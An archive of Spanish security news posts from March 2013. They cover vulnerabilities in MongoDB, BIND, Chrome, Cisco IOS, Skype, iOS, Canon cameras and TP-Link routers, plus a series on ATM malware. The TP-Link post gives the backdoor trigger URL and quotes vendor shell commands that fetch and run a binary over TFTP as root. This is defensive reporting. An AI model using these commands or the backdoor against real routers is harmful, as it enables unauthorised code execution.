domingo, 31 de marzo de 2013

Nuevos contenidos en la Red Temática CriptoRed (marzo de 2013)

Breve resumen de las novedades producidas durante el mes de marzo de 2013 en CriptoRed, la Red Temática Iberoamericana de Criptografía y Seguridad de la Información.

1. NUEVOS DOCUMENTOS EN LA RED TEMÁTICA CRIPTORED EN EL MES DE MARZO DE 2013
1.1. Vídeo conferencia Ciberdefensa en ciclo UPM TASSI 2013 (Juan Carlos Batanero, INDRA - AMETIC)
1.2. Presentación de la conferencia Ciberdefensa en ciclo UPM TASSI 2013 (Juan Carlos Batanero, INDRA - AMETIC)
1.3. Actualización a marzo de 2013 del documento Normas ISO de Seguridad de la Información (Carlos Ormella Meyer, Universidad del Museo Social Argentino)
1.4. Vídeo conferencia Planes de Contingencia en ciclo UPM TASSI 2013 (Alfonso Mur, Deloitte)
1.5. Presentación de la conferencia Planes de Contingencia en ciclo UPM TASSI 2013 (Alfonso Mur, Deloitte)

2. DOCUMENTOS RECOMENDADOS DE OTROS SERVIDORES EN EL MES DE MARZO DE 2013
2.1. Acceso gratuito al nuevo número de marzo de 2013 de la revista Red Seguridad
2.2. Vídeo ¿Cuál es la madurez de tu SGSI? (Videoblog de Vicente Aceituno, España)
2.3. Último informe de la Red de Sensores del mes de febrero de 2012 sobre virus y malware (INTECO, España)
2.4. Newsletter de la revista Red Seguridad de febrero de 2013
2.5. Ciber amenazas. La inseguridad de la información en el contexto global (Jeimy Cano, Blog IT-Insecurity, Colombia)
2.6. Vídeos de la Jornada sobre ISO 27001 y Esquema Nacional de Seguridad del COIT (Colegio Oficial de Ingenieros de Telecomunicación, España)

3. VII CONGRESO CIBSI Y II TALLER TIBETS PANAMA OCTUBRE 2013
3.1. Segundo Call For Papers para CIBSI 2013
3.2. Segundo Call For Papers para CIBSI 2013
3.3. Sigue estos eventos en:

4. RELACION CRONOLOGICA DE CONGRESOS, SEMINARIOS Y CONFERENCIAS DESTACADAS
4.01. Abril 1 al 5 de 2013: Student Forum Sixth Latin American Symposium on Dependable Computing (Río de Janeiro - Brasil)
4.02. Abril 3 de 2013: Conferencia Gobernando la seguridad hacia los objetivos corporativos, IX Ciclo de Conferencias UPM TASSI (Madrid - España)
4.03. Abril 3 al 5 de 2013: Computational Intelligence for Risk Management, Security and Defence Applications EvoRISK (Viena - Austria)
4.04. Abril 4 al 6 de 2013: European Round 2013 CyberSecurity for the Next Generation de Kaspersky Lab (Aachen - Alemania)
4.05. Abril 17 de 2013: Conferencia Seguridad en sistemas: explotando vulnerabilidades, IX Ciclo de Conferencias UPM TASSI (Madrid - España)
4.06. Abril 17 al 18 de 2013: Security Forum (Barcelona - España)
4.07. Mayo 8 de 2013: Conferencia Del disco flexible a la nube: pasado, presente y futuro de la informática forense, IX Ciclo de Conferencias UPM TASSI (Madrid - España)
4.08. Mayo 22 de 2013: Conferencia Mundo hacking, IX Ciclo de Conferencias UPM TASSI (Madrid - España)
4.09. Junio 3 al 7 de 2013: 7th IFIP International Conference on Trust Management (Málaga - España)
4.10. Junio 18 de 2013: Third International Workshop on Information Systems Security Engineering (Valencia - España)
4.11. Junio 19 al 21 de 2013: XIII Jornadas Nacionales de Seguridad Informática (Bogotá - Colombia)
4.12. Julio 3 al 7 de 2013: Tenth International Workshop on Security In Information Systems WOSIS-2013 (Angers - Francia)
4.13. Julio 10 al 12 de 2013: XIX Jornadas sobre la Enseñanza Universitaria de la Informática JENUI 2013 (Castellón de la Plana - España)
4.14. Julio 10 al 12 de 2013: XI Conferencia Internacional Privacy, Security and Trust PST 2013 (Tarragona - España)
4.15. Septiembre 16 al 18 de 2013: 8th International Workshop on Critical Information Infrastructures Security (Amsterdam - Holanda)
4.16. Octubre 29 al 31 de 2013: VII Congreso Iberoamericano de Seguridad Informática CIBSI 2013 (Ciudad de Panamá - Panamá)
4.17. Octubre 29 al 31 de 2013: II segundo Taller Iberoamericano de Enseñanza e Innovación Educativa en SI TIBETS 2013 (Ciudad de Panamá - Panamá)
Más información en:

5. FUE TAMBIEN NOTICIA EN LA RED TEMATICA EN EL MES DE MARZO DE 2013
5.01. Plan de Formación ISACA Madrid 2013 con 15% de descuento para miembros de Criptored (España)
5.02. Conferencia Ciberdelincuencia a cargo de D. Oscar de la Cruz Responsable del Grupo Delitos Telemáticos en el ciclo UPM TASSI (España)
5.03. El Aula Virtual y MOOC Crypt4you cumple un año con más de 125.000 accesos (España)
5.04. Despedida y finalización del proyecto de la Red de Sensores de INTECO RSI (España)
5.05. Segundo CFP para el congreso CIBSI y el Taller TIBETS a celebrarse en la UTP (Panamá)
5.06. Tercera edición de ExpoCloud 2013 el próximo día 12 de marzo en Madrid (España)
5.07. Webinar Cifrado y Criptografía en los Procesos de Negocio de Realsec y DIODE el 12 de marzo a las 16:00 (España)
5.08. Nace el Centro de Ciberseguridad Industrial de España y Latinoamérica (España)
5.09. Conferencia Ciberdefensa de D. Juan Carlos Batanero Director de INDRA en IX Ciclo UPM TASSI (España)
5.10. Curso de Perito Telemático Forense de la ANTPJI en la Universidad a Distancia de Madrid UDIMA (España)
5.11. Primera Jornada de Seguridad y Ciberdefensa de la Universidad de Alcalá (España)
Acceso al contenido de estas noticias:

6. OTROS DATOS DE INTERES Y ESTADISTICAS DE LA RED TEMATICA
6.1. Número actual de miembros en la red: 932
6.2. Estadísticas Criptored: 37.474 visitas, con 133.007 páginas solicitadas y 47,53 Gigabytes servidos en marzo de 2013, descargándose 29.655 archivos zip o pdf
Redes sociales: 173 seguidores en facebook y 1.573 seguidores en twitter
6.3. Estadísticas Intypedia: 12.197 reproducciones de vídeos en marzo de 2013
Redes sociales: 1.321 seguidores en facebook y 902 seguidores en twitter
6.4. Estadísticas Crypt4you: 5.823 accesos en marzo de 2013
Redes sociales: 687 seguidores en facebook y 419 seguidores en twitter



Jorge Ramió Aguirre
Coordinador de Criptored

sábado, 30 de marzo de 2013

Vulnerabilidad en MongoDB permite la ejecución de código arbitrario en el servidor


El investigador de seguridad con sobrenombre de agixid, parte de la empresa franco-suiza SCRT, ha publicado una vulnerabilidad en el sistema de bases de datos MongoDB. Esta permite la ejecución de código remoto, manipulando el puntero utilizado por el método nativeHelper para ejecutar comandos del sistema. Ya ha sido publicado un exploit para el fallo.

MongoDB es un sistema de bases de datos no relacional de código abierto desarrollado por la compañía 10gen. Es una base de datos documental, esto es, que almacena sus datos de forma estructurada. En concreto, utiliza un formato extendido de JSON, llamado BSON, propio de este sistema. Actualmente es el sistema NoSQL más popular, contando con versiones para varios sistemas operativos, y siendo utilizado en los back-ends de empresas como SAP, SourceForge o Foursquare.

La investigación de agixid pretendía ahondar en los entresijos del método 'run' del sistema para tratar de ejecutar código en el servidor. Este método ejecuta en una shell el comando que se le pase como parámetro (por ejemplo, ls en sistemas Linux). Sin embargo, este comando es sólo valido en el cliente y no permite ejecutar código a través de consultas al servidor.

Agidix descubrió que el método run simplemente realiza una llamada a nativeHelper, una función del motor JavaScript SpiderMonkey de Mozilla, pasando como parámetros un vector asociativo (run_) y el comando a ejecutar. Este vector run_ no está definido en el lado del servidor, pero sí se puede utilizar directamente un vector de la forma {"x":0x01234}, por ejemplo, para suplirlo. El valor asociado a x apunta a la dirección de memoria de una función JavaScript, y que será ejecutada sin ninguna comprobación a través de un método de tipo NativeFunction. Al poder controlar el puntero a la función que se ejecuta, se puede ejecutar código arbitrario en el servidor.

La vulnerabilidad, con identificador CVE-2013-1892, ha sido probada en la versión 2.2.3 de MongoDB para sistemas de 32 bits. La rama 2.4 no se ve afectada, ya que se ha cambiado el motor JavaScript a V8, motor de Google, que no es vulnerable. Sin embargo, la última versión de la rama 2.2 (2.2.4) fue publicada el día 26 de marzo sin ninguna alusión a la vulnerabilidad. Por otro lado, ya se ha publicado un módulo en Metasploit para su explotación.

Más información:

mongodb – SSJI to RCE

  

Francisco López

viernes, 29 de marzo de 2013

Denegación de servicio en BIND 9


BIND ha corregido un fallo en la librería libdns podría provocar el agotamiento de la memoria, lo que causaría una condición de denegación de servicio en el dispositivo. El fallo es fácilmente explotable a través de una expresión regular especialmente diseñada. La vulnerabilidad solo afecta a sistemas *nix.

BIND, o Berkeley Internet Name Domain, es prácticamente el servidor DNS estándar en sistemas UNIX y se encuentra muy extendido en sistemas Linux. Está patrocinado por el "Internet Systems Consortium" y su versión actual es la BIND 9.9.2-P1.

El error radica en la librería libdns utilizada en los sistemas *nix y de la que hace uso el proceso named de BIND (el servidor de nombres en sí). Al hacer una petición con una expresión regular, el proceso hace un uso excesivo de la memoria, que acaba siendo agotada. Además de provocar la denegación de servicio en BIND, este fallo tendría efectos indeseados sobre los sistemas instalados en la misma máquina.

La vulnerabilidad, conidentificador CVE-2013-2266, afecta a todos los servidores de nombres (tanto autoritativos como recursivos) que ejecuten cualquier versión de BIND 9.7, 9.8 y 9.9 (incluida las versiones beta) en un entorno *nix (UNIX o Linux). Las versiones anteriores están afectadas por este fallo, así como BIND 9.10.

El parche está disponible para los sistemas 9.8 y 9.9. La rama 9.7 ha terminado su ciclo de vida y se recomienda actualizar a una versión más reciente. Sin embargo, para aquellos usuarios que no puedan hacerlo, existe la posibilidad de compilar libdns sin soporte para expresiones regulares.

Tal y como apuntaba un usuario de la lista Full Disclosure, a pesar de que las vulnerabilidades de denegación de servicio son relativamente frecuentes en este sistema, esta destaca por su facilidad de explotación, reconocida en un mensaje posterior por Jeff Wright de ISC, lo que da una idea de su gravedad.

No solo BIND es vulnerable al fallo. Cualquier otro programa que haga uso de las librería libdns debe ser actualizado o configurado para desactivar el soporte a expresiones regulares mientras no haya una solución del fabricante.

Más información:

CVE-2013-2266: A Maliciously Crafted Regular Expression Can Cause Memory Exhaustion in named

On the impact of CVE-2013-2266 (BIND9)






Francisco López

jueves, 28 de marzo de 2013

Google corrige diez vulnerabilidades en Chrome

Google ha publicado la versión 26.0.1410.43 de su navegador Chrome para todas las plataformas (Windows, Linux, Mac y Chrome Frame). Esta nueva versión corrige diez vulnerabilidades de diversa importancia.


  • Dos vulnerabilidades de impacto alto: con el CVE-2013-0916, un uso de memoria previamente liberada en Web Audio descubierta por Atte Kettunen de OUSPG (que ha sido premiado con $1000 por Google). La segunda, que no ha sido atribuida, tiene identificador CVE-2013-0921 y trata el salto de restricciones de la funcionalidad Isolated Sites, que puede permitir a los procesos que inicia una web acceder a los de otra.
       
  • Otras dos vulnerabilidades de impacto medio: Un fallo en el manejo de contenido activo en elementos EMBED durante una operación de copia y pegado (con identificador CVE-2013-0926), descubierta por Subho Halder, Dev Kar y Aditya Gupta de xys3c. Por otro lado y con CVE-2013-0920, un use-after free en la API de marcadores, reportada por Mustafa Emre Acer, del Google Chrome Security Team.
        
  • Por último, seis vulnerabilidades de perfil bajo, entre las que destacan: Un uso de memoria ya liberada aprovechando extensiones que muestran ventanas emergentes (CVE-2013-0919). De nuevo por Mustafa Emre Acer, esta vulnerabilidad solo está presente en plataformas Linux.

También una falta de restricciones en el número de intentos para llevar a cabo una autenticación HTTP básica, que permitía el uso de fuerza bruta, reportada por "t3553r" y con identificador CVE-2013-0922. Por último, CVE-2013-0923, un fallo que permite la corrupción de la memoria a través de la API USB.

Además de las soluciones de seguridad, Google introduce con esta versión mejoras para el corrector ortográfico y la posibilidad de crear accesos directos para usar Chrome con distintos perfiles.

Esta actualización está disponible a través del propio navegador vía Chrome Update automáticamente o desde el sitio oficial de descarga:

Más información:

Stable Channel Update




Francisco López

miércoles, 27 de marzo de 2013

Cisco soluciona varias denegaciones de servicio en su sistema IOS

Los siete boletines publicados por Cisco solucionan otras tantas vulnerabilidades en el sistema IOS, tratándose todas ellas de denegaciones de servicio que afectan por completo a la disponibilidad de los sistemas. La baja dificultad del ataque, junto a la capacidad de ser persistente, hace que las vulnerabilidades tengan una importancia media/alta.

IOS (Internetwork Operating System) es el software estándar utilizado por Cisco en sus routers y
switches. Proporciona un sistema operativo a la vez que una interfaz de línea de comandos para la configuración del dispositivo. La versión actual es la 15.3S, aunque también está muy extendida la versión anterior (12).

Las vulnerabilidades tienen identificadores entre CVE-2013-1142 a CVE-2013-1148 y afectan a diversas versiones del sistema IOS, en especial a las 12 y 15. En resumen, se trata de vulnerabilidades localizadas en funcionalidades implementadas en diversos protocolos. Para todas, el vector de ataque es el envío de cierto tipo de paquetes cuyo procesado provoca un reinicio del dispositivo. Un atacante remoto sin necesidad de autenticación podría, a través del envío persistente de estos paquetes, provocar una denegación total de servicio a un dispositivo vulnerable.

Aunque solo se ve afectada la disponibilidad del sistema, hay varios factores que aumentan su puntuación CVSS. En primer lugar, es solo necesario el envío de un paquete (en muchas ocasiones legales, dependiendo de la vulnerabilidad). También hay que señalar que existen pruebas de concepto para explotar estas vulnerabilidades.

Además de estas, también se ha publicado otros dos boletines que cubren vulnerabilidades similares en Prime Central for HCS Assurance y Unified Communications Manager, ambos en sus versiones 8.6 y 9.

Más información:

Boletines Cisco IOS

Cisco Security Advisories, Responses, and Notices



Francisco López

martes, 26 de marzo de 2013

Ejecución remota de código en RealPlayer al reproducir MP4


Se ha anunciado una vulnerabilidad en el popular reproductor multimedia RealPlayer, que podría permitir a un atacante remoto tomar el control de los sistemas afectados.

El problema (con CVE-2013-1750) reside en un desbordamiento de búfer basado en heap al tratar archivos MP4 específicamente manipulados, que podría permitir a un atacante remoto ejecutar código arbitrario en los sistemas afectados. El código se ejecutaría con los privilegios del usuario atacado.

Se recomienda actualizar a las versiones RealPlayer 16.0.1.18 (para Windows XP, Vista y Win7).

Más información:

RealNetworks, Inc. Releases Update to Address Security Vulnerabilities.


Antonio Ropero
Twitter: @aropero

lunes, 25 de marzo de 2013

Paparazzi Over IP: Tomando el control de cámaras réflex con conectividad WIFI

Durante la conferencia ShmooCon IX, los investigadores Daniel Mende (conocido por ser el autor, entre otras herramientas, de Loki) y Pascal Turbing, ambos de la empresa ERNW, presentaron un estudio sobre la seguridad de las nuevas funcionalidades de conectividad IP en cámaras DSLR, más comúnmente conocidas como réflex digitales.

La presentación estuvo centrada en el modelo EOS-1D X, aunque según los autores los resultados pueden extrapolarse a cualquier otro modelo o fabricante con características similares. Este modelo posee conectividad a través de ethernet y, añadiendo el adaptador Wireless File Transmitter de Canon, también WiFi. Se demostró que estos dispositivos son vulnerables a través de los siguientes vectores de ataque:


  • Posibilidad de conexión directa a un servidor FTP. Esta conexión no está cifrada, y por tanto es posible extraer tanto las credenciales del servidor como las imágenes que se están enviando si el atacante captura el tráfico de la red.
        
  • Es compatible con las directrices DLNA (Digital Living Network Alliance), una organización sin animo de lucro cuyo objetivo son definir estándares de interoperabilidad entre dispositivos digitales en una relación cliente-servidor. En este caso podría ser entre la cámara y otros dispositivos, como por ejemplo una televisión. DLNA utiliza uPnP para el descubrimiento de dispositivos y HTTP/XML para el acceso al contenido, todo esto sin ningún tipo de restricción. Cualquier cliente DNLA en la misma red (incluido un navegador web) podría acceder a las fotos en la cámara.
       


  • Yendo más allá, la cámara incluye un servidor web incrustado a través del ya comentado Wireless File Transmitter. Con él se pueden descargar fotografías y acceder al modo Live View, que muestra la imagen que esté captando la cámara en ese momento y permitir así convertirla en un sistema de vigilancia. Este servidor utiliza una autenticación HTTP básica, para posteriormente utilizar una cookie con identificador de sesión de sólo 4 bytes, lo que hace posible un ataque de fuerza bruta sobre las 65535 IDs de sesión posibles, siempre que un usuario haya iniciado anteriormente sesión en el servidor.
         
  • Finalmente, se toma el control completo sobre la cámara a través de la EOS Utility. En resumen, se utiliza autenticación a través de PTP/IP (Picture Transfer Protocol), cuyos credenciales son el hostname de la cámara y su GUID. El primero no es realmente necesario, ya que se aceptan hostnames distintos al configurado, mientras que el segundo se encuentra ofuscado en la información uPnP de la cámara y es fácilmente calculable. A partir de aquí, es sencillo acceder a toda a configuración de la cámara, fotografías e imagen en tiempo real.

Evidentemente, como todos en los que se requiere captura o manipulación de tráfico, estos ataques son poco probables si la conexión WiFi está correctamente cifrada, por ejemplo mediante WPA2 y el atacante no comparte la red. Sin embargo, sí son posibles en escenarios como cafeterías, hoteles o centros comerciales, donde podrían existir conexiones WiFi compartidas con desconocidos o si el punto de acceso no es fiable.

Más información:

Shmoocon 2013 - Paparazzi Over IP (Video) [ENG]

Paparazzi over IP (Presentación) [ENG]



Francisco López

domingo, 24 de marzo de 2013

Publicada la segunda conferencia UPM TASSI Ciberdefensa de D. Juan Carlos Batanero de INDRA

Se encuentra disponible en el canal YouTube de la Universidad Politécnica de Madrid la segunda conferencia del IX Ciclo UPM TASSI 2013 "Ciberdefensa", impartida en el Campus Sur de esta universidad el 6 de marzo de 2013 por D. Juan Carlos Batanero, Director de Sistemas de Ciberdefensa y C4ISR de INDRA y Presidente de la Comisión de Seguridad en AMETIC.

http://www.youtube.com/watch?v=2dDY0I3VHK4

Puede descargar, además, la presentación en PDF desde esta dirección:
En la sección Conferencias TASSI 2013 del servidor web de Criptored encontrará todas las conferencias de este noveno ciclo.



Jorge Ramió

sábado, 23 de marzo de 2013

Ejecución remota de código en diversos routers TP-Link

Desde el blog Sekurak.pl, el investigador Michal Sajdak alerta de la posibilidad de ejecutar código de manera remota en diversos modelos de router de la firma TP-Link. Existe una puerta trasera accesible mediante el servicio TFTP hasta ahora no documentada. Afecta por el momento los modelos TL-WDR4300, TL-WR743ND y TL-WR740N.

TL-WDR4300
La vulnerabilidad se debería a una funcionalidad presente en el firmware del router que contacta de manera remota con un servidor TFTP cuando se realiza una determinada petición de recurso.

Según la investigación llevada a cabo, si se realiza una petición http GET a la URL:

http:// IP del router /userRpmNatDebugRpm26525557/start_art.html

...automáticamente el router realiza una conexión a la IP de origen de la petición buscando un servidor TFTP del que descarga un fichero de configuración con nombre "nart.out". Este será ejecutado con permisos de usuario root en el propio router.


Aparte de no estar documentada, supone un grave fallo en las políticas de seguridad del router, que permite la ejecución de código remoto mediante servidores TFTP fraudulentos. Un atacante podría crear un fichero nart.out especialmente manipulado, subirlo a un servidor TFTP y realizar la petición HTTP al router.

Esta vulnerabilidad en principio sólo es accesible desde red local a menos que se tuviera activada la gestión remota desde el exterior (HTTP-admin via WAN).

Este tipo de servicios de actualización parecen habituales en otros fabricantes. Según la documentación de la firma Atheros (chipset presente en estos modelos de router) se ofrecen ese tipo de servicios destinados a la actualización de las placas utilizando servidores TFTP para el proceso. Por ejemplo, en uno de los documentos filtrados (disponible en algunos servidores no oficiales) se puede leer:

-------

Chapter 6 Load the ART Image
This procedure is used to load the ART image in the DB120 board. Due to
limited flash memory space on the DB120, it is recommended to load the
ART image in the RAM. It is assumed that the files art.ko and nart.out
are located on a suitable TFTP server, and the IP address of the TFTP
server is 192.168.1.100.
1. Apply power to the board.
2. Wait until Kernel is loaded and executed.
3. Log in using the root username and 5up password.
4. Type these commands:
# mknod /dev/dk0 c 63 0 # cd /tmp # tftp -r art.ko -g 192.168.1.100 #
insmod art.ko # tftp -r nart.out -g 192.168.1.100 # chmod +x nart.out #
./nart.out –console
The ART client is now running and waiting for connection from host.

------

Los usuarios pueden comprobar si este servicio está presente, realizando una consulta a la URL comentada y confirmando que en el navegador aparezca el mensaje "Art successfully started":


TP-Link está avisado de la vulnerabilidad pero todavía no hay actualizaciones oficiales disponibles. Como alternativa es posible instalar firmwares libres como OpenWRT:


Usuarios de diversos foros han advertido que esta funcionalidad y posiblemente la vulnerabilidad también está presente en los modelos:
WR743ND,WR842ND, WA-901ND, WR941N, WR941ND, WR1043ND, WR2543ND, MR3220, MR3020, WR841N

Más información:

TP-Link http/tftp backdoor

More information about TP-Link backdoor




José Mesa Orihuela

viernes, 22 de marzo de 2013

Historia del malware en cajeros automáticos: Ahora en América Latina (y III)

El malware en cajeros automáticos no es nuevo, periódicamente aparecen noticias al respecto. La novedad en esta ocasión es que si bien se había detectado este tipo de malware en las cunas del crimen en Internet (Rusia y Brasil), en 2012 también se han detectado estas amenazas en cajeros automáticos de América Latina.

Brasil: Chupa-Cabra

Después del escándalo en 2009 en Rusia, a principios de 2010 se observó este fenómeno en Brasil, y se llamó "chupa-cabra". Este volvía a ser un malware perfectamente diseñado para su finalidad. En estos cajeros, los datos viajaban a través del puerto serie o USB a otro dispositivo, y ahí es donde atacaban, puesto que se trataba del punto más sencillo donde recuperar la información de la tarjeta. Para obtener el PIN, también instalaban un keylogger en el sistema.

Para instalar este tipo de malware, los atacantes debían introducir un USB en el cajero. Existe un vídeo en el que se observa a varios individuos captados por una cámara de seguridad en Brasil. El USB tenía un instalador del malware y el "autorun" del sistema podía hacer el resto para preparar todo el entorno. Si no, la configuración por defecto de los sistemas (contraseñas en blanco o conocidas por los fabricantes también permitirían instalar el malware.

Los atacantes debían volver luego a recuperar la información almacenada en el disco (cifrada, habitualmente). Para ello o bien lo hacían ellos mismos o pagaban a muleros para que fueran captados por las cámaras de seguridad ante cualquier problema.

América Latina

En América Latina, se ha observado durante 2012 un incremento de la actividad en este sentido, con dos tipos diferentes de malware en cajeros. Uno de ellos más sencillo (destinado a la marca Wincor), y otro más complejo (destinado a Diebold). Este último parece una variación específica del malware original encontrado en Rusia en 2009, que ataca al software Agilis de Diebold específicamente (del que se filtró en un momento dado un manual de funcionamiento interno). Si bien este software no es vulnerable en sí mismo, los programadores deben estudiarlo y conocerlo internamente para poder robar la información y aprovechar los datos.

En los últimos meses, se ha detectado este malware en Paises de Centroamérica  y otros países de América Latina en menor medida, donde la alerta ha saltado a raíz del gran número de tarjetas clonadas que estaban apareciendo.

Dos tipos de malware

El primer malware encontrado, de una complejidad menor, está programado en Visual Basic y ataca a la marca Wincor. Se instala como servicio para poder arrancarse en cada reinicio, con nombres muy disimulados para que pueda parecer a simple vista que se trata de un servicio legítimo del sistema (Windows XP). El programa captura la información del cajero (también a través de keylogger) y la almacena en ficheros codificados (con el algoritmo Huffman). Se almacenaba en c:\windows\system32\ simulando nombres habituales del sistema. Su funcionalidad básica parece la de buscar logs del cajero y descifrarlos para obtener los datos.

El segundo malware encontrado, de una complejidad mayor, está programado específicamente contra el software de Diebold. Se inyecta en procesos concretos del software del cajero y extrae la información necesaria. Entender el funcionamiento de este malware es muy complejo, puesto que requiere de altos conocimientos del software y hardware del cajero.

Conclusiones

Los cajeros suelen estar aislados de Internet, pero esto no los aísla del malware. Una pobre configuración de los equipos también ayuda a los atacantes en estos casos: aunque tengan acceso físico a la máquina, existen formas de impedir que se ejecute, instale, y funcione software desconocidos en estas máquinas. También la configuración efectiva del sistema y el uso adecuado de las cámaras de vigilancia podrían mitigar el riesgo.

Más información

The ‘Chupa Cabra’ malware: attacks on payment Devices

una-al-dia (18/03/2013) Historia del malware en cajeros automáticos: Ahora en América Latina (I)

una-al-dia (20/03/2013) Historia del malware en cajeros automáticos: Ahora en América Latina (II)



Sergio de los Santos
Twitter: @ssantosv

jueves, 21 de marzo de 2013

Elevación de privilegios a través de Skype para Microsoft Windows

La instalación por defecto de Skype es vulnerable a un ataque de elevación de privilegios que podría permitir a un atacante local sin privilegios ejecutar código arbitrario con privilegios de SYSTEM en entornos Windows.

Skype es un software gratuito que permite realizar llamadas mediante voIP, videoconferencias, enviar mensajes instantáneos y compartir archivos desde un ordenador personal, smartphone, tablet o videoconsola entre otros dispositivos.

Existe un error en la aplicación 'Click to Call' de Skype (c2c_service.exe) al no restringir correctamente las rutas de búsqueda para las librerías DLL que utiliza. Además el directorio donde se encuentra esta aplicación dispone de permisos de escritura para cualquier usuario. Para Windows XP el directorio donde se instala 'Click to Call' es 'C:\Documents and Settings\All Users\Application Data\Skype\Toolbars\Skype C2C Service', mientras que para Windows 7 es 'C:\ProgramData\Skype\Toolbars\Skype C2C Service'.

Un atacante local sin privilegios podría aprovechar lo anterior para realizar un DLL Hijacking y conseguir ejecutar código arbitrario a través de un archivo DLL especialmente manipulado que sea cargado por 'Click to Call' (por ejemplo 'msi.dll') desde su propio directorio. Debido a que 'c2c_service.exe' se ejecuta como un servicio con privilegios SYSTEM en los sistemas operativos Microsoft Windows, la ejecución arbitraria de código se haría con dichos permisos.

Para aprovechar la vulnerabilidad es necesario reiniciar el servicio 'c2c_service.exe' o el equipo.

La última versión publicada de Skype para Windows soluciona esta vulnerabilidad. Esta disponible para su descarga desde la página oficial.

Más información:

Skype Click to Call Update Service local privilege escalation



Juan José Ruiz

miércoles, 20 de marzo de 2013

Historia del malware en cajeros automáticos: Ahora en América Latina (II)

El malware en cajeros automáticos no es nuevo, periódicamente aparecen noticias al respecto. La novedad en esta ocasión es que si bien se había detectado este tipo de malware en las cunas del crimen en Internet (Rusia y Brasil), en 2012 también se han detectado estas amenazas en cajeros automáticos de América Latina.

Un troyano para cajeros automáticos se enfrenta a dos retos principalmente para que sea lucrativo para el atacante.

  • Los cajeros automáticos no suelen tener conexión a Internet ni usuario que interactúe. Esto impide su infección sencilla y la recogida inmediata de información. Lo suelen suplir con la introducción de memorias USB en los propios cajeros, retirando la carcasa y accediendo a los puertos correspondientes. Aunque suene extraño, se puede hacer, sobre todo en cajeros poco concurridos.
         
  • Se debe entender perfectamente el funcionamiento del software que corre en el cajero, normalmente proporcionado por diferentes empresas. En los últimos años, los atacantes parecen centrados en la compañía Diebold. Los datos que interesan al atacante son tomados de la memoria de los procesos de los programas "legítimos", y por tanto se debe conocer perfectamente cómo funcionan y sus formatos.


El malware detectado en Rusia en 2009 no era nada genérico. De hecho, fue compleja su detección, casi por casualidad. Los cajeros no suelen estar dotados de antivirus, y aunque lo hubieran estado, el comportamiento del malware era tan poco habitual, tan específico, que no era cazado por firmas por ningún motor. Las casas antivirus no tuvieron acceso sencillo a las muestras y, aunque lo hubieran tenido, para funcionar y entender completamente su funcionamiento era igualmente necesario disponer del software específico del cajero, algo no tan sencillo. No solo porque es privado y de pago, sino porque requiere de un hardware también muy específico (lectores, teclados numéricos, etc.) al que los analistas no suelen tener acceso.

Estas dificultades también deben ser superadas por los atacantes. Por tanto, existe un mercado negro de controladores y software oficiales de cajeros automáticos, dispositivos e incluso ingenieros que se dedican a estudiarlo para poder sacar de ellos toda la información.



  
Continuamos en la siguiente entrega.

Más información:

una-al-dia (18/03/2013) Historia del malware en cajeros automáticos: Ahora en América Latina (I)




Sergio de los Santos
Twitter: @ssantosv

martes, 19 de marzo de 2013

Actualización de Apple iOS y Apple TV

Apple ha liberado una actualización para dispositivos con sistema operativo iOS que corrige diversas vulnerabilidades que podrían permitir la ejecución de código, revelación de información sensible, eludir restricciones, y comprometer la integridad del dispositivo afectado.

Las vulnerabilidades afectan a los dispositivos Apple iPhone 3GS y posteriores, iPad 2 y posteriores, iPod a partir de la 4ª generación, y Apple TV.

Son las siguientes:


  • CVE-2013-0912: ejecución de código arbitrario a través de la visita de una página web especialmente diseñada debido a un problema de comprobación de tipos al procesar ficheros SVG en Webkit. Fue descubierta por Nils y Jon de MWR Labs.
        
  • CVE-2013-0977: un error al procesar ficheros ejecutables Mach-O con segmentos superpuestos podría permitir a un atacante local ejecutar código sin firmar en el dispositivo. Ha sido descubierta por el usuario "evad3rs".
        
  • CVE-2013-0978: un error relacionado con el controlador "ARM prefetch abort" podría permitir la revelación de información sensible de manera local. Descubierta por "evad3rs".
        
  • CVE-2013-0979: al restaurar una copia de seguridad, Lockdownd modifica los permisos de determinados ficheros, incluso si la ruta a dichos ficheros incluía un enlace simbólico. Esto podría permitir a un atacante local comprometer la integridad del dispositivo. Al igual que las dos anteriores, esta vulnerabilidad ha sido descubierta por "evad3rs".
        
  • CVE-2013-0980: error al manejar las llamadas de emergencia con el teléfono bloqueado mientras se mantiene pulsado el botón de apagado del teléfono, que concedería acceso al contenido del terminal evitando la protección de la contraseña de desbloqueo. Descubierta por Christopher Heffley de theMedium.ca.
       
  • CVE-2013-0981: ejecución de código arbitrario debido a un error de falta de comprobación de los punteros a objetos utilizados por el driver "IOUSBDeviceFamily". Descubierta por "evad3rs".

La actualización del sistema operativo iOS 6.1.3 soluciona todas las vulnerabilidades anteriormente explicadas.

Las vulnerabilidades CVE-2013-0977, CVE-2013-0978 y CVE-2013-0981 también afectan a Apple TV con versiones anteriores a la 5.2.1.

Más información:

APPLE-SA-2013-03-19-1 iOS 6.1.3

APPLE-SA-2013-03-19-2 Apple TV 5.2.1

Salto de restricciones en Apple iOS 6 (o cómo realizar llamadas desde un iPhone bloqueado)



Juan José Ruiz






lunes, 18 de marzo de 2013

Historia del malware en cajeros automáticos: Ahora en América Latina (I)

El malware en cajeros automáticos no es nuevo, periódicamente aparecen noticias al respecto. La novedad en esta ocasión es que si bien se había detectado este tipo de malware en las cunas del crimen en Internet (Rusia y Brasil), en 2012 también se han detectado estas amenazas en cajeros automáticos de América Latina. Repasaremos la historia.

Los fraudes en cajeros automáticos con "skimmers" han existido desde hace muchos años. Básicamente se trata de interponer un dispositivo físico en el cajero, de forma que lea la tarjeta de crédito y recupere su información cuando se introduce o se retira de la ranura. Los cajeros más modernos incluyen técnicas contra este tipo de estafas (por ejemplo el hecho de "escupir" la tarjeta no de forma lineal, sino con pequeños saltos y paradas para evitar ser leída), pero los ataques han evolucionado y ganado en eficacia.

Los skimmers clásicos

El mayor problema (o riesgo) para los atacantes es el hecho de abrir el aparato e instalar el sistema. Esos momentos son críticos, por la dificultad que entraña y porque deben exponerse a las cámaras de seguridad, etc. Además deben hacerlo dos veces: durante la instalación y durante la recogida de datos. Los skimmers suelen almacenar la información en una memoria, y los atacantes deben recoger lo almacenado en una sesión.

En 2008 se detectaron los primeros skimmers que incluían una interesante mejora: incluían una tarjeta SIM que permitía enviar por SMS los datos robados. Así no era necesario volver después de cierto tiempo a recoger el botín, además de que se podían tener en "tiempo real" según se iban robando. El skimmer era capaz de leer la tarjeta y también el PIN según se pulsaba en el teclado. Todo era enviado directamente al atacante. Permitían el envío de casi dos mil mensajes durante las 24 horas que le duraba la batería.

